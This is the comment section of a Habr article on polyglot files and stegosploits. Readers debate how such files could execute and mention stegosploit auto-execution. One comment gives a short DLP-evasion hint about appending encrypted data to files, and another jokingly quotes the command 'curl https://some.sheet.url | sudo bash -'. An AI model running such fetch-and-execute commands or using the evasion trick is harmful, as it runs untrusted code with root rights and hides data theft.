Как стать автором
Обновить

Файлы полиглоты или как картинка с котиком станет угрозой для безопасности вашей информации

Уровень сложностиПростой
Время на прочтение6 мин
Количество просмотров7.7K
Всего голосов 5: ↑5 и ↓0+5
Комментарии9

Комментарии 9

Не очень понятно, как этот эксплоит, даже зашитый в недра картинки или пдф-ника все-же запустится, даже с учетом назначения файлу признака исполнимости.
Другое дело, что для обхода ДЛП-систем этот метод хорош, т.к. даже продвинутая длп система максимум может применить OCR на графический образ, в котором будут котики.

Для обхода DLP полиглот-то не нужен. Попробуйте добавить зашифрованные данные без спецфических заголовков в конец любого файла

предварительно дав файлу разрешение на запуск

Вот досада-то какая.

К сожалению все так(

Но если интересно, можете почитать про стегосплоиты, о которых я упомянул.
Они запускаются автоматически, как только пользователь загружает страницу браузера, на которой находится стегосплоит, так как на сайте картинка перестает быть JPEG файлом, а становится HTML элементом. (это, конечно, если стегосплоит является JPEG + HTML полиглотом)

Да нет, к счастью.

Допустим права на файлик выдали - а как он запустится то? Это же не исполняемый файл. Или он просто носитель кода и что бы его выполнить нужна инфраструктура которая ищет в "посылке" код и выполняет его?

Линукс очень медленно и неверно шагает на десктоп. Так что можно ванговать картинки типа "Вы близко! Разрешите исполнение этого файла чтобы получить $unlimited прямо сейчас!"

Или "Поздравляю! Добро пожаловать в Gogle! Для получения позиции в нашей компании, заполните это резюме. Оно содержит скрепт для отправки донных на наш сервир, так што разрешите изполнения файла"

А как же каноническое

curl https://some.sheet.url | sudo bash -

Зарегистрируйтесь на Хабре, чтобы оставить комментарий

Публикации

Истории